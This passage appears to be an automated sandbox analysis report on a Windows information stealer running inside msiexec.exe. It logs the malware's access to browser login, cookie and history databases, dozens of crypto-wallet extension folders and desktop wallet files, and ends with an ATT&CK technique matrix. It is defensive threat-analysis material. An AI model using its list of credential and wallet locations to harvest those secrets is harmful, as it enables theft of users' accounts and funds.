              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Code function: 3_2_00402FD8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00402FD8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A367A8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,6_2_00007FF764A367A8
              Source: C:\Windows\SysWOW64\msiexec.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: msiexec.exe String found in binary or memory: Wallets/Electrum-LTC
              Source: msiexec.exe String found in binary or memory: Wallets/ElectronCash
              Source: msiexec.exe String found in binary or memory: Jaxx Liberty
              Source: msiexec.exe String found in binary or memory: window-state.json
              Source: msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletn5o
              Source: msiexec.exe String found in binary or memory: ExodusWeb3
              Source: msiexec.exe String found in binary or memory: Wallets/Ethereum
              Source: msiexec.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: msiexec.exe String found in binary or memory: keystore
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: Yara matchFile source: 0000000B.00000003.2399976992.0000000003406000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic column; a number preceding a technique is the count shown in the matrix for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Windows Management Instrumentation; 1 Native API; 3 Command and Scripting Interpreter; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 11 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 11 DLL Side-Loading; 211 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 11 DLL Side-Loading; 11 Masquerading; 121 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Rundll32
Credential Access: 1 OS Credential Dumping; 1 Credential API Hooking; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 12 File and Directory Discovery; 232 System Information Discovery; 331 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 31 Data from Local System; 1 Credential API Hooking; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 115 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
